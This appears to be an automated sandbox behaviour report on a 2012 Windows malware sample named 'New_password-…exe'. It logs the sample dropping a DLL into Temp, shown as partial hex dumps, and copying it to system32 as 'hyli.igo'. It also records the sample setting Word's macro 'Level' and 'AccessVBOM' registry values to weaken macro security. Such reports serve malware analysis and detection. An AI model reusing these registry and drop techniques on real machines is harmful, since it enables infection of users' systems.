HKEY_USERS\Software\Microsoft\Office\11.0\Word\Security Level object name not found 1 10003D03 RegQueryValueExA
HKEY_USERS\Software\Microsoft\Office\11.0\Word\Security AccessVBOM object name not found 1 10003D64 RegQueryValueExA
HKEY_USERS\Software\Microsoft\Office\11.0\Word\Security Level success or wait 1 10003D03 RegQueryValueExA
HKEY_USERS\Software\Microsoft\Office\11.0\Word\Security AccessVBOM success or wait 1 10003D64 RegQueryValueExA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell success or wait 1 1000290D RegQueryValueExA

Mutex Activites

Name Completion Count Source Address Symbol

Process Activites

PID Process info class Completion Count Source Address Symbol
PID Filepath Completion Count Source Address Symbol
1764 C:\New_password-1eb4cd066eb69b63e74387a82443d998.exe success or wait 1 401A10 ExitProcess

Thread Activites

TID PID EIP EAX (Usermode EIP) Filepath Completion Count Source Address Symbol
712 1764 7C8106F9 40145C C:\New_password-1eb4cd066eb69b63e74387a82443d998.exe success or wait 1 401378 CreateThread
TID PID Path Completion Count Source Address Symbol
TID Delay Completion Count Source Address Symbol
712 -5s success or wait 1 1000401B Sleep

Memory Activites

PID Filepath Base Length Protection Completion Count Source Address Symbol
1764 C:\New_password-1eb4cd066eb69b63e74387a82443d998.exe 340000 12FEF0 page read and write success or wait 1 4018D0 VirtualAlloc
1764 C:\New_password-1eb4cd066eb69b63e74387a82443d998.exe 350000 12FED0 page execute and read and write success or wait 1 401928 VirtualAlloc
1764 C:\New_password-1eb4cd066eb69b63e74387a82443d998.exe 370000 12FE04 page execute and read and write success or wait 1 3512FB VirtualAlloc
1764 C:\New_password-1eb4cd066eb69b63e74387a82443d998.exe 400000 12FE04 page execute and read and write success or wait 1 351796 VirtualAlloc
PID Filepath Base Length New Protection Old Protection Completion Count Source Address Symbol
Time Private Usage (mb) Workingset (mb) Page File Usage (mb)
09:39:48 0 1 0
09:39:50 0 1 0
09:39:52 0 1 0
09:39:54 0 2 0
09:39:56 0 2 0
09:39:59 0 2 0
09:40:01 0 2 0
09:40:46 0 2 0
09:40:50 0 3 0
09:40:53 0 3 0
09:41:41 0 3 0
09:41:48 0 3 0
09:41:59 0 3 0
09:42:03 0 3 0

System Activites

System info class Completion Count Source Address Symbol

Timing Activites

Time Completion Count Source Address Symbol

Windows UI Activites

Window name Class name HWND Completion Count Source Address Symbol
HWND Completion Count Source Address Symbol
Desktop HWND Parent HWND Enum Childrens TID Window Handles Completion Count Source Address Symbol
0 0 false 2C8 1, 57005C, 4E0049, 4F0044, 530057, 73005C, 730079, 650074, 33006D, 5C0032, 700078, 700073, 720032, 730065, 64002E success or wait 2 10003F5B CoUninitialize
HWND Message LParam WParam Completion Count Source Address Symbol
TID Message LParam WParam Completion Count Source Address Symbol
Module Thread id Hook code Completion Count Source Address Symbol
Chronological Activities
Operation Data Completion Time
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 2C8 HWNDs: 1, 57005C, 4E0049, 4F0044, 530057, 73005C, 730079, 650074, 33006D, 5C0032, 700078, 700073, 720032, 730065, 64002E success or wait 1022159870
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 2C8 HWNDs: 1, 57005C, 4E0049, 4F0044, 530057, 73005C, 730079, 650074, 33006D, 5C0032, 700078, 700073, 720032, 730065, 64002E success or wait 1022271449
File opened Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Access: read attributes and synchronize and generic read Options: sequential only and synchronous io non alert and non directory file and open reparse point Attributes: none Content Overwritten: true success or wait 1023726630
File opened Path: C:\WINDOWS\system32\hyli.igo Access: read attributes and delete and synchronize and generic write Options: sequential only and synchronous io non alert and non directory file Attributes: archive Content Overwritten: true success or wait 1023727864
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Name: Shell success or wait 1024171676
Process terminated PID: 1764 Path: C:\New_password-1eb4cd066eb69b63e74387a82443d998.exe success or wait 1024305403
Section loaded Path: \KnownDlls\advapi32.dll Access: write and read and execute Type: unknown Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid success or wait 530438197
Section loaded Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: unknown Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid success or wait 530442130
Section loaded Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: unknown Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid success or wait 530447041
Memory allocated PID: 1764 Path: C:\New_password-1eb4cd066eb69b63e74387a82443d998.exe Base: 340000 Length: 12FEF0 Allocation Type: unknown Protection: page read and write success or wait 530456920
Memory allocated PID: 1764 Path: C:\New_password-1eb4cd066eb69b63e74387a82443d998.exe Base: 350000 Length: 12FED0 Allocation Type: unknown Protection: page execute and read and write success or wait 530459416
Memory allocated PID: 1764 Path: C:\New_password-1eb4cd066eb69b63e74387a82443d998.exe Base: 370000 Length: 12FE04 Allocation Type: unknown Protection: page execute and read and write success or wait 530464890
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 400000 Size: 0 Protection: execute and read and write Mapped to pid: own pid access denied 530466583
Section loaded Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: unknown Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid success or wait 530467125
Section loaded Path: \NLS\NlsSectionCType Access: read Type: unknown Baseaddress: 390000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 530474103
Memory allocated PID: 1764 Path: C:\New_password-1eb4cd066eb69b63e74387a82443d998.exe Base: 400000 Length: 12FE04 Allocation Type: unknown Protection: page execute and read and write success or wait 530478861
Thread created PID: 1764 TID: 712 EIP: 7C8106F9 EAX: 40145C Imagepath: C:\New_password-1eb4cd066eb69b63e74387a82443d998.exe success or wait 530486659
File created Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: null success or wait 531483016
File opened Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Access: read attributes and synchronize and generic write Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: true success or wait 531939927
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65 success or wait 532174228
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: 55 89 E5 53 83 EC 44 C6 45 F5 25 C6 45 F6 78 C6 45 F3 25 C6 45 F4 75 C6 45 F7 00 C7 44 24 0C F4 92 2B CB C7 44 24 08 F4 92 2B CB 8D 45 F3 89 44 24 04 8D 5D D3 89 1C 24 FF 15 8C 82 00 10 89 5C 24 08 C7 44 24 04 00 00 00 00 C7 04 24 00 00 00 00 FF 15 2C 82 00 10 83 EC 0C 89 C3 FF 15 7C 82 00 10 3D B7 success or wait 532269878
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: C7 04 24 0E 00 00 00 E8 50 21 00 00 84 C0 75 08 8D 65 F4 5B 5E 5F C9 C3 8B 1D EC 82 00 10 09 F3 8D BD A0 FD FF FF 89 7C 24 04 C7 04 24 0C 00 00 00 E8 4A 35 00 00 8B 15 8C 82 00 10 89 95 90 FD FF FF A1 EC 82 00 10 B1 64 D3 F8 89 FA 29 C2 89 D0 83 C0 64 89 44 24 04 C7 04 24 0B 00 00 00 E8 1C 35 00 00 success or wait 532280577
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: E4 00 00 00 80 BD 87 EB FF FF 00 0F 84 C3 00 00 00 85 C0 7E 42 31 F6 EB 28 8D 76 00 A1 EC 82 00 10 B1 E8 D3 F8 89 DA 29 C2 01 D6 C7 04 24 E8 03 00 00 FF 15 80 82 00 10 51 39 B5 B4 EB FF FF 7E 16 E8 EE 17 00 00 83 F8 02 75 D1 A1 EC 82 00 10 8D 3C 85 02 00 00 00 83 FF 02 0F 84 AA 00 00 00 C7 04 24 01 success or wait 532290026
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: B5 F0 FC FF FF B1 96 F3 A5 89 04 24 FF 15 6C 82 00 10 50 8D 85 48 FF FF FF 89 44 24 04 C7 04 24 00 00 00 00 E8 57 2D 00 00 8D 55 C8 89 54 24 08 C7 44 24 04 04 00 00 00 89 04 24 E8 BC FD FF FF C7 45 E4 00 00 00 00 C7 45 E0 00 00 00 00 C7 45 D8 00 00 00 00 C7 45 DC 00 00 00 00 8B 85 E0 FC FF FF 89 44 success or wait 532375958
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: 74 3A 39 F2 77 22 8D 41 04 8D 76 00 39 C2 76 0E 89 C1 80 39 3A 74 D1 8D 41 01 39 C2 77 F2 31 C0 5B 5E 5F C9 C3 8D 76 00 89 F0 66 90 40 80 38 2F 74 0C 39 C2 77 F6 8D 46 01 EB D1 90 89 F0 39 C2 76 F4 C6 00 00 8D 78 01 8A 40 01 3C 0D 74 21 3C 0A 74 1D 39 FA 76 DF 89 F9 8D 76 00 41 8A 01 3C 0D 74 0F 3C success or wait 532385124
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: 89 04 24 FF 15 A8 82 00 10 83 EC 10 85 C0 74 66 01 C3 85 DB 7F 9A EB C9 84 C9 74 AD 89 F2 84 D2 75 07 BE 01 00 00 00 EB A0 47 74 B0 8D 45 E4 89 44 24 08 89 7C 24 04 8D 95 E0 F7 FF FF 89 14 24 E8 8B FB FF FF 85 C0 0F 85 3B 01 00 00 80 3F 3C 74 24 8B 55 14 C6 02 00 8D 85 E0 F7 FF FF 89 44 24 04 C7 04 success or wait 532392018
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: 5C 24 04 89 04 24 FF 15 C0 82 00 10 83 EC 24 8B 45 F4 8B 5D FC C9 C3 90 55 89 E5 57 56 53 81 EC AC 00 00 00 8B 75 0C 8B 7D 10 8B 45 08 89 04 24 E8 5B FF FF FF 89 C3 85 C0 74 61 85 FF 74 14 8D 85 68 FF FF FF 89 44 24 04 89 3C 24 E8 8B 1F 00 00 89 C6 8B 45 1C 89 44 24 14 8B 45 18 89 44 24 10 8B 45 14 success or wait 532488639
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: 24 FF 15 A8 82 00 10 83 EC 10 89 85 E4 F7 FF FF C6 84 05 E8 F7 FF FF 00 85 C0 7E 36 89 C2 4A 31 FF 31 F6 8D 85 E8 F7 FF FF 89 D9 89 F3 89 CE EB 12 8D 76 00 80 F9 0A 74 43 31 FF 31 DB 85 D2 74 0F 40 4A 8A 08 80 F9 0D 75 EA B3 01 85 D2 75 F1 89 F3 8B 55 08 C7 82 4C 09 00 00 00 00 00 00 89 1C 24 FF 15 success or wait 532495722
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: 00 C7 44 24 14 04 00 00 00 8D 55 08 89 54 24 10 C7 44 24 0C 04 00 00 00 89 5C 24 08 C7 44 24 04 00 00 00 00 89 04 24 E8 EC F7 FF FF 83 C4 24 5B C9 C3 66 90 55 89 E5 53 83 EC 34 C7 45 F4 00 00 00 00 C7 04 24 14 00 00 00 E8 66 17 00 00 89 C3 C7 04 24 12 00 00 00 E8 58 17 00 00 C7 44 24 14 04 00 00 00 success or wait 532504187
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: 10 75 E6 8B 45 08 C7 80 24 08 00 00 01 00 00 00 C7 80 48 08 00 00 00 00 00 00 C7 44 24 04 10 50 00 10 83 C0 14 89 04 24 FF 15 EC 81 00 10 83 EC 08 8B 55 08 80 7A 05 00 75 48 8B 82 24 08 00 00 EB 20 66 90 8B 5D 08 8B 83 24 08 00 00 89 C2 C1 E2 07 01 C2 80 7C 13 14 00 74 27 40 89 83 24 08 00 00 89 44 success or wait 532603291
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: 8B 55 0C 89 54 24 04 89 04 24 FF 15 FC 81 00 10 83 EC 08 85 C0 0F 94 C0 8D 65 F8 5E 5F C9 C3 90 55 89 E5 57 56 53 83 EC 6C 8B 55 0C 80 3A 3A 74 1F 3B 55 10 73 10 89 D6 8B 45 10 90 46 80 3E 3A 74 10 39 F0 77 F6 83 C4 6C 5B 5E 5F C9 C3 66 90 89 D6 39 75 10 76 EF A1 20 80 00 10 85 C0 74 E6 89 F7 29 D7 success or wait 532612561
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: E8 7B 0D 00 00 89 44 24 04 89 34 24 FF 95 64 FE FF FF 83 EC 08 8A 03 84 C0 0F 84 91 00 00 00 31 C9 8D 76 00 8D 50 D0 80 FA 09 77 0A 8D 14 89 0F BE C0 8D 4C 50 D0 43 8A 03 84 C0 75 E7 83 F9 77 7E 6E 8D 5D B0 89 5C 24 04 C7 04 24 1A 00 00 00 E8 2B 0D 00 00 8D 45 E0 89 44 24 20 8D 45 E4 89 44 24 1C C7 success or wait 532620465
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: 51 04 00 00 A1 E0 81 00 10 E8 7A FA FF FF C7 04 24 88 13 00 00 FF 15 80 82 00 10 51 8D 4D E0 8D 55 E4 89 F8 E8 47 FB FF FF E9 19 FF FF FF 66 90 8D 45 A0 89 44 24 08 C7 44 24 04 00 00 00 00 C7 04 24 00 00 00 00 B9 01 00 00 00 BA 0E 00 00 00 8B 45 A8 E8 30 FA FF FF 85 C0 0F 85 6B FF FF FF 8B 45 A8 85 success or wait 532712117
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: 89 7C 24 0C C7 44 24 08 00 00 00 00 8B 85 64 FF FF FF 89 44 24 04 8B 02 89 04 24 89 95 5C FF FF FF E8 96 00 00 00 89 03 89 7C 24 04 8B 85 64 FF FF FF 89 04 24 E8 8A 05 00 00 83 EC 08 89 03 83 C3 04 8B 95 5C FF FF FF 83 C2 04 46 8B 85 60 FF FF FF 39 34 C5 20 52 00 10 7F A5 89 D6 FF 85 60 FF FF FF 83 success or wait 532723028
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: 84 C0 0F 84 70 01 00 00 8B 7D 0C C7 45 E8 00 00 00 00 66 90 FF 45 08 85 DB 0F 84 45 01 00 00 B8 61 00 00 00 31 D2 F7 75 EC 38 45 F3 0F 8D B6 00 00 00 66 90 B8 41 00 00 00 88 D9 D3 E8 38 45 F3 0F 8C CA 00 00 00 80 7D F3 5A 0F 8F C0 00 00 00 89 D8 B1 5A D3 E0 8D 48 5A 88 4D E7 BA 41 00 00 00 BE 41 00 success or wait 532729319
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: AA BF 5B 1E C6 BA A6 BF 45 90 AB B0 F8 B4 B8 C4 C2 CB 2F 6E FC 95 89 D2 2A FE CE C9 95 D5 DC A1 D8 91 29 6B E9 DD D4 D0 30 E0 84 DD 91 CC DD B6 85 DD 39 30 B6 D2 D6 BF 88 6E ED F7 AB 5D 1B F2 9B 89 28 7B A8 CE C7 DD 45 FE 3D DC 82 83 D6 C4 00 90 40 00 00 00 00 00 00 00 00 00 00 00 00 00 04 70 00 10 success or wait 532825201
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 success or wait 532947139
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: 00 4F 68 7A 67 6E 00 59 45 45 59 63 75 6E 6F 71 6A 77 00 44 66 67 67 75 76 56 48 52 50 00 74 79 6F 71 75 62 00 47 68 67 6E 63 75 65 20 4C 78 71 67 76 6B 72 6E 20 77 79 6E 73 75 61 00 25 76 20 4F 6D 64 20 22 25 75 22 28 45 79 42 64 6F 20 77 20 43 55 20 56 74 78 6C 71 6B 29 20 43 75 20 4F 6F 74 6A 0D success or wait 533048521
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: 00 00 00 00 36 3F 91 4C 00 00 00 00 6E 90 00 00 01 00 00 00 07 00 00 00 07 00 00 00 28 90 00 00 44 90 00 00 60 90 00 00 9C 10 00 00 E0 10 00 00 E8 10 00 00 F4 15 00 00 0C 16 00 00 D8 16 00 00 70 15 00 00 78 90 00 00 80 90 00 00 8A 90 00 00 95 90 00 00 9C 90 00 00 A3 90 00 00 AA 90 00 00 00 00 01 00 success or wait 533053349
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: 00 10 00 00 A8 00 00 00 3A 30 53 30 5E 30 75 30 92 30 A9 30 BF 30 FA 30 16 31 40 31 46 31 75 31 87 31 93 31 99 31 C3 31 D0 31 DE 31 E4 31 08 32 0E 32 2F 32 51 32 69 32 72 32 BB 32 E3 32 37 33 5C 33 78 33 8A 33 E4 33 1A 34 38 34 43 34 98 34 AD 34 D7 34 EC 34 F8 34 06 35 93 35 AA 35 B1 35 C0 35 C6 35 success or wait 533062648
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 0 Value: unknown success or wait 533164320
Section loaded Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Access: write and read and execute Type: commit Baseaddress: 3A0000 Size: 24576 Protection: execute Mapped to pid: own pid success or wait 533496748
Section loaded Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Access: query and write and read and execute Type: image Baseaddress: 10000000 Size: 49152 Protection: read write Mapped to pid: own pid success or wait 533614528
Section loaded Path: \KnownDlls\user32.dll Access: write and read and execute Type: unknown Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid success or wait 536593642
Section loaded Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: unknown Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid success or wait 536681058
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 3A0000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 537361369
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 3A0000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 537576503
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid success or wait 537688339
Section loaded Path: \KnownDlls\ws2_32.dll Access: write and read and execute Type: unknown Baseaddress: unknown Size: unknown Protection: unknown Mapped to pid: unknown object name not found 538506166
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute Type: image Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid success or wait 538585998
Section loaded Path: \KnownDlls\WS2HELP.dll Access: write and read and execute Type: unknown Baseaddress: unknown Size: unknown Protection: unknown Mapped to pid: unknown object name not found 539033665
Section loaded Path: C:\WINDOWS\system32\ws2help.dll Access: query and write and read and execute Type: image Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 539144363
Section loaded Path: \KnownDlls\iphlpapi.dll Access: write and read and execute Type: unknown Baseaddress: unknown Size: unknown Protection: unknown Mapped to pid: unknown object name not found 539872039
Section loaded Path: C:\WINDOWS\system32\iphlpapi.dll Access: query and write and read and execute Type: image Baseaddress: 76D60000 Size: 102400 Protection: read write Mapped to pid: own pid success or wait 539983603
Section loaded Path: \KnownDlls\ole32.dll Access: write and read and execute Type: unknown Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid success or wait 543957631
Section loaded Path: \KnownDlls\oleaut32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid success or wait 545416677
Key created Path: HKEY_USERS\Software\Microsoft\Office\11.0\Word\Security success or wait 742506083
Key value queried Path: HKEY_USERS\Software\Microsoft\Office\11.0\Word\Security Name: Level object name not found 742506639
Key value queried Path: HKEY_USERS\Software\Microsoft\Office\11.0\Word\Security Name: AccessVBOM object name not found 742506843
Key value set Path: HKEY_USERS\Software\Microsoft\Office\11.0\Word\Security Name: Level Type: dword Data: 1 Old data: success or wait 742507069
Key value set Path: HKEY_USERS\Software\Microsoft\Office\11.0\Word\Security Name: AccessVBOM Type: dword Data: 1 Old data: success or wait 742617277
Thread delayed Time: -5 TID: 712 success or wait 980996250
Key value queried Path: HKEY_USERS\Software\Microsoft\Office\11.0\Word\Security Name: Level success or wait 999402974
Key value queried Path: HKEY_USERS\Software\Microsoft\Office\11.0\Word\Security Name: AccessVBOM success or wait 999619868
Key value replaced with new Path: HKEY_USERS\Software\Microsoft\Office\11.0\Word\Security Name: Level Type: dword Data: 4 Old data: 1 success or wait 999841230
Key value replaced with new Path: HKEY_USERS\Software\Microsoft\Office\11.0\Word\Security Name: AccessVBOM Type: dword Data: 0 Old data: 1 success or wait 999843986
General
Start time: 09:39:59
Start date: 24/01/2012
Path: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE
Wow64 process (32bit): false
Commandline: unknown
Imagebase: 0x30000000
File size: 12061896 bytes
MD5 hash: 7A0FA3A0282B4630F3768A74441D4BAE

File Activites

File Path Access Options Content overwritten Completion Count Source Address Symbol
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp read attributes and synchronize and generic read sequential only and synchronous io non alert and non directory file and open reparse point true success or wait 1 266116C CopyFileA
File Path Access Attributes Options Completion Count Source Address Symbol
C:\WINDOWS\system32\hyli.igo read attributes and delete and synchronize and generic write archive sequential only and synchronous io non alert and non directory file success or wait 1 266116C CopyFileA
File Path Completion Count Source Address Symbol
Old File Path New File Path Completion Count Source Address Symbol
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp C:\WINDOWS\system32\hyli.igo success or wait 1 266116C CopyFileA
File Path Offset Length Value Completion Count Source Address Symbol
File Path Offset Length Value Completion Count Source Address Symbol
File Path Disposition File Mask Completion Count Source Address Symbol
File Path Disposition Data Ascii Data Completion Count Source Address Symbol

Section Activites

File Path Access Type Base Size Mapped to pid Protection Completion Count
\KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
unknown query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
\NLS\NlsSectionUnicode read unknown 260000 90112 own pid readonly success or wait 1
\NLS\NlsSectionLocale read unknown 280000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortkey query and read unknown 2D0000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortTbls read unknown 320000 24576 own pid readonly success or wait 1
\NLS\NlsSectionSortkey00000409 read unknown unknown unknown unknown unknown object name not found 1
\NLS\NlsSectionSortkey00000409 read unknown unknown unknown unknown unknown object name not found 1
\KnownDlls\ADVAPI32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
\KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
\KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
\KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
\KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
\KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1
\KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 410000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 410000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
\NLS\NlsSectionCType read unknown 850000 12288 own pid readonly success or wait 1
C:\Program Files\Common Files\Microsoft Shared\OFFICE11\MSO.DLL write and read and execute commit 860000 12242944 own pid execute success or wait 1
C:\Program Files\Common Files\Microsoft Shared\OFFICE11\MSO.DLL query and write and read and execute image 30C90000 12288000 own pid read write success or wait 1
\BaseNamedObjects\ShimSharedMemory write unknown 870000 57344 own pid read write success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\1033\WWINTL.DLL write and read and execute commit 8C0000 774144 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\1033\WWINTL.DLL query and read commit 8C0000 774144 own pid readonly success or wait 1
\BaseNamedObjects\Local\Mso97SharedDg19211106568_S-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown unknown unknown unknown unknown object name not found 1
\BaseNamedObjects\Local\Mso97SharedDg19211106568_S-1-5-21-507921405-1960408961-839522115-500 query and write and read reserve A10000 126976 own pid read write success or wait 1
\KnownDlls\uxtheme.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\uxtheme.dll query and write and read and execute image 5AD70000 229376 own pid read write success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit A30000 1056768 own pid execute success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1
\KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit A30000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit A30000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit A30000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\msctf.dll write and read and execute commit A50000 299008 own pid execute success or wait 1
C:\WINDOWS\system32\msctf.dll query and write and read and execute image 74720000 311296 own pid read write success or wait 1
\BaseNamedObjects\CiceroSharedMemDefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read commit unknown unknown unknown unknown object name exists 1
\BaseNamedObjects\CTF.TimListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500SFM.DefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown A50000